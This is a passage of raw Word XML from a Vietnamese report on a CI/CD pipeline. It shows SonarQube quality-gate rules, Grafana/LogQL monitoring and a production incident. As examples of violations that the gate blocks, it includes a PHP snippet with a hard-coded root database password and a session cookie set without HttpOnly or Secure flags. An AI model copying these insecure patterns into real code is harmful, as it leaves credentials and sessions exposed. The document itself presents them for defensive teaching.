          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Lỗ hổng bảo mật mức độ nghiêm trọng cao nhất, buộc phải chặn lại.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tác động tới Quality Gate và cơ chế chặn:</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Chỉ số bảo mật </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>security_rating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> lập tức bị hạ từ mức 1 (mức A cao nhất) xuống mức 5 (mức E kém nhất).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SonarQube kích hoạt điều kiện vi phạm </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>{"metric": "security_rating", "op": "GT", "error": "1"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, đánh dấu Quality Gate ở trạng thái </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>`ERROR / FAILED`</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val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Kịch bản điều phối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ci/sonarqube.py check</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> đọc tệp trạng thái và trả về mã lỗi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>sys.exit(1)</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4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>GitHub Actions Runner dừng khẩn cấp Job Stage 2. Stage 3 và Stage 4 bị hủy bỏ.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="40" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">GitHub Branch Protection Rules lập tức </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>vô hiệu hóa nút bấm Merge Pull Request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, ngăn chặn hoàn toàn mã lỗi lọt vào nhánh tích hợp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.2.2. Chặn để lộ mật khẩu trong mã nguồn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hành vi vi phạm trong mã nguồn:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Khai báo trực tiếp mật khẩu cơ sở dữ liệu trong tệp kết nối </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>lib/db.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>:</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Vi phạm lưu trữ mật khẩu cứng</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $db_host = "ilfreight_db";</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $db_user = "root";</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $db_pass = "p@ssw0rd"; // Hard-coded database password</w:t>
              <w:br/>
              <w:t xml:space="preserve">  $conn = mysqli_connect($db_host, $db_user, $db_pass, "ilfreight");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc vi phạm:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php:S181</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>secrets:S6702</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>"Credentials should not be hard-coded"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chặn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> SonarQube đánh dấu vi phạm nghiêm trọng, hạ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>security_rating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> về mức E, ngắt đường ống CI/CD và yêu cầu lập trình viên đưa mật khẩu vào biến môi trường </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>getenv('DB_PASS')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> và GitHub Secrets.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.2.3. Chặn Cookie thiếu cờ bảo mật</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hành vi vi phạm:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Khởi tạo Cookie phiên làm việc mà không bật cờ bảo vệ:</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 Thiếu cờ HttpOnly và Secure</w:t>
              <w:br/>
              <w:t xml:space="preserve">  setcookie("auth_token", $token, time() + 3600, "/");</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc vi phạm:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php:S2255</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>"Using cookies without the 'HttpOnly' and 'Secure' flags is security-sensitive"</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chặn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Điều kiện </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>{"metric": "security_hotspots_reviewed", "op": "LT", "error": "100"}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> yêu cầu 100% điểm nóng phải được rà soát. Do chưa được phê duyệt (tỷ lệ duyệt 0% &lt; 100%), Quality Gate báo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>FAILED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, chặn merge Pull Request.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.2.4. Chặn mã nguồn viết cẩu thả và khó bảo trì</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Hành vi vi phạm:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Một hàm xử lý chứa quá nhiều vòng lặp và câu lệnh rẽ nhánh lồng nhau phức tạp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc vi phạm:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>php:S3776</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>"Cognitive Complexity of functions should not be too high"</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chặn:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Độ phức tạp cao làm chỉ số bảo trì </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>sqale_rating</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> tụt xuống B hoặc C, vi phạm ngưỡng chất lượng và buộc lập trình viên phải sửa đổi và làm sạch mã nguồn trước khi được tích hợp.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H2"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="27"/>
        </w:rPr>
        <w:t>5.3. Các sự cố web và hạ tầng trên môi trường Production</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Text"/>
        <w:spacing w:line="300" w:lineRule="auto" w:before="0" w:after="120"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Phần này phân tích 6 sự cố kỹ thuật thực tế phát sinh trong quá trình vận hành hệ thống trên máy chủ VPS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.3.1. Sự cố mất kết nối cơ sở dữ liệu gây lỗi 500 và 503</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Bản chất lỗi:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ứng dụng web PHP không thể thiết lập kết nối tới container cơ sở dữ liệu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>ilfreight_db:3306</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (do cơ sở dữ liệu đang khởi động lại hoặc mạng nội bộ gặp sự cố), phát sinh ngoại lệ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>mysqli_sql_exception: Connection refused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Mã HTTP Response trả về:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 500 Internal Server Error</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nếu ứng dụng cố gắng xử lý truy vấn) hoặc </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>HTTP 503 Service Unavailable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (nếu endpoint </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>/health</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> trả về kết quả kiểm tra trạng thái thất bại).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Quy tắc Promtail thu thập:</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Lớp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>InlaneLogger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> bắt ngoại lệ, trích xuất chuỗi nguyên nhân gốc và vết ngăn xếp, ghi ra dòng log JSON mang cấu trúc chẩn đoán với nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>log_category="app_exception"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>level="error"</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Promtail khớp quy tắc bóc tách đối tượng JSON lỗi, tự động gán nhãn </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>exception_class="mysqli_sql_exception"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Hiển thị trên Grafana:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Panel 1 hiển thị chi tiết dòng code phát sinh ngoại lệ tại </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>lib/db.php:24</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>, chuỗi nguyên nhân gốc và thời gian xảy ra sự cố.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-Bullet1"/>
        <w:spacing w:line="288" w:lineRule="auto" w:before="0" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:i w:val="0"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Cú pháp lọc lỗi LogQL trên Grafana:</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{container="ilfreight_web", log_category="app_exception"} </w:t>
              <w:br/>
              <w:t xml:space="preserve">  | json </w:t>
              <w:br/>
              <w:t xml:space="preserve">  | class =~ ".*(mysqli_sql_exception|PDOException).*" </w:t>
              <w:br/>
              <w:t xml:space="preserve">  | line_format "{{.timestamp}} [LỖI KẾT NỐI DB] tại {{.file}}:{{.line}} -&gt; {{.message}}"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="CTDT-H3"/>
        <w:spacing w:before="160" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
